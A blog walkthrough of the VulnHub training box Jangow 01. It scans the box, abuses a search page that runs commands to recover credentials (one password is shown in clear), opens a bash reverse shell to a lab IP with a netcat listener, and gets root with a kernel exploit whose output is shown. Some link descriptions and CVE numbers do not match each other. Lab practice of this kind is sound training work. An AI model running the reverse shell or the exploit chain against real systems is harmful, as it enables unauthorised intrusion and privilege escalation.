Jangow-01-1.0.1 || VulnHub Walthrough

In this article, we are going to tackle an easy box from VulnHub. If you’re not familiar with VulnHub, then read my Articles.

  • Learn More: 

Vulhub: Vulnerable by Design

This resource explores Vulhub, a platform designed to provide vulnerable environments for practicing and learning various cybersecurity concepts such as penetration testing, ethical hacking, and exploit development. Vulhub offers a range of intentionally vulnerable virtual machines that allow security enthusiasts to hone their skills in a safe and controlled environment.



Settings up

Before getting started, You need an isolated network environment on VirtualBox. The box, we are going to write up is called  Jangow01-1.0.1.

1. Download the OVA mirror file from VulnHub.

Jangow: 1.0.1

This is a vulnerable virtual machine designed for penetration testing and learning purposes. Jangow provides a hands-on opportunity to practice web application security testing and hone your skills in identifying and exploiting vulnerabilities. By exploring this VM, users can gain practical experience in web application security.


2. The settings up are quite easy and it is similar to the past.

  • Open VirtualBox
  • Click on import, and browse the file from the Download directory.

3. Check the Network Adapter, and if it is set to a Host-only adapter or not.



Once you are done with the settings, let’s start the instance VMs. 

The instance is ready, and we are going for the enumeration phase.


Enumeration

Now, switch to Kali Linux. Next, we are going to identify the IP address with the help of netdiscover. Open a terminal and type the following command:

┌─[mrdev@TS]─[~]
└──╼ $ sudo netdiscover -i vboxnet0

 Currently scanning: 192.168.61.0/16   |   Screen View: Unique Hosts                                                          
                                                                                                                              
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                              
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:15      1      60  Unknown vendor                                                             
 192.168.56.2    08:00:27:8b:8b:9e      1      60  PCS Systemtechnik GmbH                                                     
  192.168.56.118  08:00:27:21:5d:30      1      60  PCS Systemtechnik GmbH                                                     

We have discovered the target IP address i.e., “192.168.56.118”.

Let's Perform a network scan to detect what ports are open, which is already known as an essential part of the enumeration process. This offers us the opportunity to better understand the attacking surface, and design targeted attacks. As in most cases, we are going to use the famous Nmap tool.


Network Scanning using Nmap

  • -sC: Perform a script scan using the default set of scripts.
  • -sV: Enables version detection, which will detect what versions are running on what port.

┌──(mr-dev㉿kali)-[~]
└─$ sudo nmap -sC -sV 192.168.56.118
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-16 11:47 IST
Nmap scan report for 192.168.56.118
Host is up (0.0011s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
80/tcp open  http    Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2021-06-10 18:05  site/
|_
|_http-title: Index of /
MAC Address: 08:00:27:21:5D:30 (Oracle VirtualBox virtual NIC)
Service Info: Host: 127.0.0.1; OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.36 seconds
                                                                                                                               
┌──(mr-dev㉿kali)-[~]
└─$ 

From the output, we have spotted that we have ports 21, and port 80 open.

  • Port 21/TCP runs an FTP service, which means, that if you have a valid credential then it will be easy to gain login access to the server.
  • Port 80/TCP running an HTTP service, which indicates that there is some vulnerable website being hosted.

To look at the contents ourselves, we can open a web browser of our choice and navigate to the target's IP address in the URL bar at the top of the window. The URL redirects us to a broken link page:



We found that directory listing is enabled on the target machine. We found one folder named ‘site/’ in the current directory.


Foothold

Following the previously shown link brought us to this “Grayscale” site. Looking around, there doesn’t seem to be anything too interesting except for the “Buscar” page found in the top right.




That’s interesting, it looks like it’s performing some kind of post request. It seems like, this website is vulnerable to Local File Inclusion


Local File Inclusion Vulnerability

The buscar seems to be like a Spanish word. If you translate it using Google translate on the web, the result shows us like this. 


It means we can search for anything from here. Let's see what can we do, with this LFI vulnerability

Let’s search for the ls command to list the files and directories. Switch to view page source mode by clicking right on the mouse > click on View Page source.

For a better view, switch to view page source by right click on the mouse.

Let me search again the ls -al command to list all hidden files.

From the output, we have spotted a WordPress directory existing within it. After visiting the WordPress page, we noticed that this WordPress is in a broken state. This may be happening, because WordPress may not be able to access the database, or maybe the WordPress database may be deleted.


Let's switch back to the buscar tab, and find out if any other files may exist or not, which may help us to gain an FTP connection.

I quickly noticed that there’s a “config.php” file that seems to contain something else. Open the file using the cat command and read the contents within it.

This may contain a username and password which may help us to gain access with the FTP client tool. 


Attempting Login Session Retrieval with FTP Client Tool

Let’s try to attempt login access using the FTP client tool using the passwords with the username, but I quickly discovered that this does not work.

┌─[mrdev@TS]─[~]
└──╼ $ ftp 192.168.56.118
Connected to 192.168.56.118.
220 (vsFTPd 3.0.3)
Name (192.168.56.118:mrdev): desafio02
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
ftp>bye
221 Goodbye
┌─[mrdev@TS]─[~]
└──╼ $

The current working directory path is /var/www/html . Let me list all hidden files and directories that can be within /var/www/html.


I noticed that there’s a “.backup” file that seems to contain backup database credentials. Read the file using the cat command.



Let’s again try to attempt to gain access to the server using the FTP client tool.

┌─[mrdev@TS]─[~]
└──╼ $ ftp 192.168.56.118
Connected to 192.168.56.118.
220 (vsFTPd 3.0.3)
Name (192.168.56.118:mrdev): jangow01
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /home/jangow01
250 Directory successfully changed.
ftp> 

You can find out the user flag from the jangow01 directory. You can read the flag.txt file by downloading it from the FTP server using the get command.


Exploitation: Way to Find a Reverseshell Connection

We need to find a way to escalate our privileges from the user jangow01 to the super admin role. One way to try this is by checking if a reverse shell connection is possible or not. Let's examine the possible methods one by one.

Method 1: Using php-reverse-shell.php

A reverse shell connection is possible if we push a php-reverse-shell file to the server and execute it.

We can chain this with the LFI vulnerability that we have already identified, in order to upload malicious PHP code to the target system that will be responsible for returning a reverse shell to us. We will then access this PHP file through the LFI and the webserver will execute the PHP code.

We can either create our own PHP code or use one of the many available php-reverse-shell that can be found online through a Google search.

Firstly, we have to create a “test.php” file using the nano text editor.

┌─[mrdev@TS]─[~]
└──╼ $ sudo  nano test.php

Paste the code by pressing ctrl+shift+v. Now, modify the code so it can suit our needs. We are going to change the Listening Host IP, and the Listening port variables to match our settings, and then we will attempt to upload the file.

But the upload isn’t possible, as the jangow01 user doesn’t have any permission to modify the web directories.

┌─[mrdev@TS]─[~]
└──╼ $ ftp 192.168.56.118
Connected to 192.168.56.118.
220 (vsFTPd 3.0.3)
Name (192.168.56.118:mrdev): jangow01
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 0        0            4096 Oct 31 19:36 html
226 Directory send OK.
ftp> put test.php
local: test.php remote: test.php
229 Entering Extended Passive Mode (|||65069|)
553 Could not create file.
ftp>


Method 2: Using Netcat

A reverse shell connection can also be possible with the Netcat command. 



Type the following command:

┌─[mrdev@TS]─[~]
└──╼ $ nc 192.168.56.118 21
220 (vsFTPd 3.0.3)
USER jangow01
331 Please specify the password
PASS abygurl69
230 login successful.
ls 
530 Unknown command

This is also not possible in terms of reverse shell connection.


Method 3: Using the Bash Shell script

There is a method that can give us a reverse-shell connection . You find this code by searching on Google.

/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.XXX/443 0>&1 '

Modify this code IP address and port.

Take a look closer at the top of the URL bar at the top of the window, when we execute the script it automatically translates the bash script to a string.

There is a way to encode the bash script to an encoded URL string. Visit the URL encoder by searching on Google.

  • Visit: 

URL Encoder

URL Encoder is a simple online tool for encoding URLs. It converts special characters into a format that can be transmitted over the internet. This tool is useful for encoding URLs to ensure compatibility with various systems and for security purposes.


Load the output code to the buscar. Before running this script, you have to create a NetCat listener .

┌─[mrdev@TS]─[~]
└──╼ $ sudo nc -lvnp 443
listening on [any] 443 ...

Once this command is run our terminal will appear stuck, however, our Netcat listener has caught a connection.

┌─[mrdev@TS]─[~]
└──╼ $sudo nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.118] 57958
bash: cannot set terminal process group (2778): Inappropriate ioctl for device
bash: no job control in this shell
www-data@jangow01:/var/www/html/site$

We got the foothold. The received shell is not fully interactive, however, we can make it a bit better by using Python3.

┌─[mrdev@TS]─[~]
└──╼ $ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.118] 57958
bash: cannot set terminal process group (2778): Inappropriate ioctl for device
bash: no job control in this shell
www-data@jangow01:/var/www/html/site$ python3 -c 'import pty;pty.spawn("/bin/bash")'
<html/site$ python3 -c  'import pty;pty.spawn("/bin/bash")'
www-data@jangow01:/home/jangow01$  export TERM=xterm
export TERM=xterm
www-data@jangow01:/var/www/html/site$ 

Finally, we have the fully interactive shell now. Switch the user to jangow01 using the sudo su command and paste the password.

www-data@jangow01:/home/jangow01$ su jangow01  
su jangow01
Password: abygurl69

jangow01@jangow01:~$


Privilege Escalation

The next step is escalating to the root user in order to gain the highest privileges on the system. Switch to back the user jangow01 directory and list out all hidden files and directories that we have not listed before.

www-data@jangow01:/var/www/html/site$ cd /home/jangow01
cd /home/jangow01
www-data@jangow01:/home/jangow01$ ls -al
ls -al
total 40
drwxr-xr-x 4 jangow01 desafio02 4096 Feb  9 03:49 .
drwxr-xr-x 3 root     root      4096 Oct 31 19:04 ..
-rw------- 1 jangow01 desafio02  200 Oct 31 19:39 .bash_history
-rw-r--r-- 1 jangow01 desafio02  220 Jun 10  2021 .bash_logout
-rw-r--r-- 1 jangow01 desafio02 3771 Jun 10  2021 .bashrc
drwx------ 2 jangow01 desafio02 4096 Jun 10  2021 .cache
drwxrwxr-x 2 jangow01 desafio02 4096 Jun 10  2021 .nano
-rw-r--r-- 1 jangow01 desafio02  655 Jun 10  2021 .profile
-rw-r--r-- 1 jangow01 desafio02    0 Jun 10  2021 .sudo_as_admin_successful
-rw-rw-r-- 1 jangow01 desafio02   33 Jun 10  2021 user.txt
-rw-r--r-- 1 jangow01 desafio02  444 Feb  9 03:49 wget-log
www-data@jangow01:/home/jangow01$

For Privilege Escalation, we are going to use a tool called LinPEAS, which can automate a big part of the enumeration process in the target system.


Privilege Escalation Enumeration with LinPEAS


  • Download LinPEAS From Here: 

PEASS-ng Releases

PEASS-ng is a collection of Windows-based tools for privilege escalation, allowing security professionals to assess and improve the security of Windows environments. This link leads to the releases page on GitHub, where you can find and download the latest versions of PEASS-ng tools.


Now, we have to transfer the  LinPEAS.sh, file to our target system by using the FTP service.

┌─[mrdev@TS]─[~]
└──╼ $ ftp 192.168.56.118
Connected to 192.168.56.118.
220 (vsFTPd 3.0.3)
Name (192.168.56.118:mrdev): jangow01
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 0        0            4096 Oct 31 19:36 html
226 Directory send OK.
ftp> cd /home/jangow01
250 Directory successfully changed.
ftp> put linpeas.sh 
local: linpeas.sh remote: linpeas.sh
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
764129 bytes sent in 0.02 secs (32.9013 MB/s)
ftp> 

On the target machine, you can verify by listing the files and directories. 

jangow01@jangow01:~$ ls -al
ls -al
total 788
drwxr-xr-x 4 jangow01 desafio02   4096 Fev  9 03:56 .
drwxr-xr-x 3 root     root        4096 Out 31 19:04 ..
-rw------- 1 jangow01 desafio02    200 Out 31 19:39 .bash_history
-rw-r--r-- 1 jangow01 desafio02    220 Jun 10  2021 .bash_logout
-rw-r--r-- 1 jangow01 desafio02   3771 Jun 10  2021 .bashrc
drwx------ 2 jangow01 desafio02   4096 Jun 10  2021 .cache
-rw------- 1 jangow01 desafio02 764129 Fev  9 03:56 linpeas.sh
drwxrwxr-x 2 jangow01 desafio02   4096 Jun 10  2021 .nano
-rw-r--r-- 1 jangow01 desafio02    655 Jun 10  2021 .profile
-rw-r--r-- 1 jangow01 desafio02      0 Jun 10  2021 .sudo_as_admin_successful
-rw-rw-r-- 1 jangow01 desafio02     33 Jun 10  2021 user.txt
-rw-r--r-- 1 jangow01 desafio02    790 Fev  9 03:54 wget-log
jangow01@jangow01:~$

As you can see, this file contains only read and write permission but does not have any execution permission.

jangow01@jangow01:~$ chmod +x linpeas.sh
chmod +x linpeas.sh
jangow01@jangow01:~$ ./linpeas.sh         #execute the LinPEAS shell script
./linpeas.sh


                            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                    ▄▄▄▄▄▄▄             ▄▄▄▄▄▄▄▄
             ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄
         ▄▄▄▄     ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
         ▄    ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄          ▄▄▄▄▄▄               ▄▄▄▄▄▄ ▄
         ▄▄▄▄▄▄              ▄▄▄▄▄▄▄▄                 ▄▄▄▄ 
         ▄▄                  ▄▄▄ ▄▄▄▄▄                  ▄▄▄
         ▄▄                ▄▄▄▄▄▄▄▄▄▄▄▄                  ▄▄
         ▄            ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄   ▄▄
         ▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                ▄▄▄▄
         ▄▄▄▄▄  ▄▄▄▄▄                       ▄▄▄▄▄▄     ▄▄▄▄
         ▄▄▄▄   ▄▄▄▄▄                       ▄▄▄▄▄      ▄ ▄▄
         ▄▄▄▄▄  ▄▄▄▄▄        ▄▄▄▄▄▄▄        ▄▄▄▄▄     ▄▄▄▄▄
         ▄▄▄▄▄▄  ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄   ▄▄▄▄▄ 
          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄        ▄          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ 
         ▄▄▄▄▄▄▄▄▄▄▄▄▄                       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄                         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
          ▀▀▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
               ▀▀▀▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▀▀
                     ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀

    /---------------------------------------------------------------------------\
    |                             Do you like PEASS?                            |
    |---------------------------------------------------------------------------| 
    |         Become a Patreon    :     https://www.patreon.com/peass           |
    |         Follow on Twitter   :     @carlospolopm                           |
    |         Respect on HTB      :     SirBroccoli & makikvues                 |
    |---------------------------------------------------------------------------|
    |                                 Thank you!                                |
    \---------------------------------------------------------------------------/
          linpeas-ng by carlospolop

<MORE>

╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
  [1] af_packet
      CVE-2016-8655
      Source: http://www.exploit-db.com/exploits/40871
  [2] exploit_x
      CVE-2018-14665
      Source: http://www.exploit-db.com/exploits/45697
  [3] get_rekt
      CVE-2017-16695
      Source: http://www.exploit-db.com/exploits/45010

<MORE>
jangow01@jangow01:~$ 

After analyzing the output, we found a piece of important information that our target is vulnerable to these exploits. 


Local Privilege Escalation Vulnerability in Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27)

Let’s try to exploit the get_rekt . You can find out the script from the exploit DB database.

  • Click here to download: 

Exploit Database: WordPress Plugin Insert or Embed Articulate Content into WordPress - Remote Code Execution

This exploit entry describes a vulnerability in the WordPress plugin "Insert or Embed Articulate Content into WordPress" that allows for remote code execution. Understanding and mitigating such vulnerabilities is essential for securing WordPress websites.


Upload this file to the server using the FTP service.

┌─[mrdev@TS]─[~]
└──╼ $ ftp 192.168.56.118
Connected to 192.168.56.118.
220 (vsFTPd 3.0.3)
Name (192.168.56.118:mrdev): jangow01
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 0        0            4096 Oct 31 19:36 html
226 Directory send OK.
ftp> cd /home/jangow01
250 Directory successfully changed.
ftp> put '/home/mrdev/Downloads/linpeas.sh' 
local: '/home/mrdev/Downloads/linpeas.sh' remote: '/home/mrdev/Downloads/linpeas.sh'
local: '/home/mrdev/Downloads/linpeas.sh': No such file or directory
ftp> put cve-2017-16995 
local: cve-2017-16995 remote: cve-2017-16995
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
764129 bytes sent in 0.02 secs (32.9013 MB/s)
ftp> 

Compile the program to compile the exploit using the GCC command-line utility.

On execution, it creates a new file in the current directory. Now execute the output file. On successful execution, we can see that the kernel exploit grants us root.

jangow01@jangow01:~$ ls -al
ls -al
total 812
drwxr-xr-x 7 jangow01 desafio02   4096 Fev 10 13:06 .
drwxr-xr-x 3 root     root        4096 Out 31 19:04 ..
-rw------- 1 jangow01 desafio02    425 Fev  9 04:30 .bash_history
-rw-r--r-- 1 jangow01 desafio02    220 Jun 10  2021 .bash_logout
-rw-r--r-- 1 jangow01 desafio02   3771 Jun 10  2021 .bashrc
drwx------ 2 jangow01 desafio02   4096 Jun 10  2021 .cache
drwxr-x--- 3 jangow01 desafio02   4096 Fev  9 03:57 .config
-rw------- 1 jangow01 desafio02  13728 Fev 10 13:06 cve-2017-16995.c
drwxr-xr-x 2 jangow01 desafio02   4096 Fev  9 04:56 GCONV_PATH=.
drwx------ 2 jangow01 desafio02   4096 Fev  9 03:58 .gnupg
-rwx--x--x 1 jangow01 desafio02 764129 Fev 10 12:56 linpeas.sh
drwxrwxr-x 2 jangow01 desafio02   4096 Jun 10  2021 .nano
-rw-r--r-- 1 jangow01 desafio02    655 Jun 10  2021 .profile
-rw-r--r-- 1 jangow01 desafio02      0 Jun 10  2021 .sudo_as_admin_successful
-rw-rw-r-- 1 jangow01 desafio02     33 Jun 10  2021 user.txt
jangow01@jangow01:~$ gcc cve-2017-16995.c -o cve-2017-16995  # Compile the Program
gcc cve-2017-16995.c -o cve-2017-16995
jangow01@jangow01:~$ ./cve-2017-16995    #Execute the Program
./cve-2017-16995
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88003dab8300
[*] Leaking sock struct from ffff88003998c780
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880035af9e40
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff880035af9e40
[*] credentials patched, launching shell...

You can find the root flag to complete the challenge.

# cd /root
cd /root
# ls
ls
proof.txt
# cat proof.txt
cat proof.txt
                       @@@&&&&&&&&&&&&&&&&&&&@@@@@@@@@@@@@@@&&&&&&&&&&&&&&                          
                       @  @@@@@@@@@@@@@@@&#   #@@@@@@@@&(.    /&@@@@@@@@@@                          
                       @  @@@@@@@@@@&( .@@@@@@@@&%####((//#&@@@&   .&@@@@@                          
                       @  @@@@@@@&  @@@@@@&@@@@@&%######%&@*   ./@@*   &@@                          
                       @  @@@@@* (@@@@@@@@@#/.               .*@.  .#&.   &@@@&&                    
                       @  @@@, /@@@@@@@@#,                       .@.  ,&,   @@&&                    
                       @  @&  @@@@@@@@#.         @@@,@@@/           %.  #,   %@&                    
                       @@@#  @@@@@@@@/         .@@@@@@@@@@            *  .,    @@                   
                       @@&  @@@@@@@@*          @@@@@@@@@@@             ,        @                   
                       @&  .@@@@@@@(      @@@@@@@@@@@@@@@@@@@@@        *.       &@                  
                      @@/  *@@@@@@@/           @@@@@@@@@@@#                      @@                 
                      @@   .@@@@@@@/          @@@@@@@@@@@@@              @#      @@                 
                      @@    @@@@@@@@.          @@@@@@@@@@@              @@(      @@                 
                       @&   .@@@@@@@@.         , @@@@@@@ *            .@@@*(    .@                  
                       @@    ,@@@@@@@@,   @@@@@@@@@&*%@@@@@@@@@,    @@@@@(%&*   &@                  
                       @@&     @@@@@@@@@@@@@@@@@         (@@@@@@@@@@@@@@%@@/   &@                   
                       @ @&     ,@@@@@@@@@@@@@@@,@@@@@@@&%@@@@@@@@@@@@@@@%*   &@                    
                       @  @@.     .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%*    &@&                    
                       @  @@@&       ,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%/     &@@&&                    
                       @  @@@@@@.        *%@@@@@@@@@@@@@@@@@@@@&#/.      &@@@@&&                    
                       @  @@@@@@@@&               JANGOW               &@@@                          
                       @  &&&&&&&&&@@@&     @@(&@ @. %.@ @@%@     &@@@&&&&                          
                                     &&&@@@@&%       &/    (&&@@@&&&                                
                                       (((((((((((((((((((((((((((((





da39a3ee5e6b4b0d3255bfef95601890afd80709

Congratulations on the completion of capturing both flags.
Tags

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.

#buttons=(Ok, Go it!) #days=(20)

Our website uses cookies to enhance your experience. Learn More
Ok, Go it!